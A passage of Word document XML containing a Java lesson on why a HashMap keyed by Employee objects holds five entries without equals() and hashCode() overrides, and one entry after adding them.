        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47018915" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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thi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id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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4B782" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>thi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nam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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730B7A3" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>//this.addr = add;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5301D802" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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08C89EDE" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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138371D5" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2C149" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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publ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stat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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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args</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ADDD3E" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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510D778D" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e1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Employee</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1</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB048DF" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e2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Employee</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1</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E85506" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e3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Employee</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1</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2912A1FF" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e4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Employee</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1</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD6CCF" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e5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Employee</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1</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA40B61" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> h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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F555B55" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>h</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pu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e1</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e1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189DB694" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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7572186A" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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351F93BE" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>h</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pu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e5</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e5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1773B5F8" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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System</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ou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println</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HS siz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h</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size</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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D18ABAE" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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164B3A60" w14:textId="4B9A96F8" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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2F3D84A8" w14:textId="5741E4DC" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197F86A7" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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your code, you're using a HashMap to store Employee objects, but there is a key issue. By default, Java uses the equals() and hashCode() methods to compare objects in collections like HashMap. If you do not override these methods in the Employee class, the default behavior of equals() and hashCode() will be used, which is based on the reference equality (i.e., checking if two objects refer to the exact same memory location).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D854A" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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ce each Employee object created in your code (e1, e2, etc.) is a different object (even though they have the same values), the HashMap will treat them as different keys and thus will store all of them in the map. Therefore, the map will contain 5 entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF52CE" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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 Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA88A65" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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ince the default implementation of equals() and hashCode() in the Object class checks for reference equality, the HashMap will treat each Employee object as a unique key. As a result, there will be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 unique entries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D20B32" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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ixing the Issue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F047A72" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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o have the HashMap treat Employee objects with the same id and name as the same key, you need to override the equals() and hashCode() methods in the Employee class. Here's how you can do that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA35DD" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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Updated Code with equals() and hashCode() Override:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE51AEC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4346C466"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Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE94FDB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA92D04"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E30F5F5"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07586317"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64DE2DD7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A916BB2"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7DD564A"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014451CB"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3502846E"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C9F45D5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4546C180"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verride equals method to compare Employee objects based on id and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467A27D0"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57562802"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equals</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Objec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F49BF94"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thi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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4744FD"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obj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getClas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Clas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282E8EE7"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> employe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p>
    <w:p w14:paraId="1D2D0A76"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i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mploye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d </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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qual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ame</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F722D6"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B006102"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78964777"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verride hashCode method to ensure consistent hashing for equal objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384093D8"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2074A9CD"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hashCod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6A2D944"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Objec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has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2075DD99"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4C2EC87"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F8EEDB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF00C0A"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es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00ADC96"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BBD3132"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041528AE"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC642B3"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e3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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F99C4D"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE168F"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e5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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E42498"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5CC158"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h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p>
    <w:p w14:paraId="54723CFC"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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A7EAA"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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFA27E8"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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D9DB8E"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4</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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C89C31"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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1CFA31"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB6DCFA"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S size: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iz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utput will be 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58483EFB" w14:textId="77777777"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4F2C52D" w14:textId="68FA41D0" w:rsidR="006A6E00" w:rsidRPr="00CE4B95"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3DBD7B35" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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 with Corrected equals() and hashCode() Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023DAB10" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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S size: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D82556" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D0148" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Now that we have overridden equals() and hashCode() based on id and name, when you insert e1, e2, e3, etc., into the HashMap, the map will treat all Employee objects with the same id and name as the same object. Therefore, only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be added to the HashMap, and the size will be 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6D1A4" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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y This Fix Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E655A0B" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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quals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that two Employee objects are considered equal if they have the same id and name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513C2D30" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Code()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
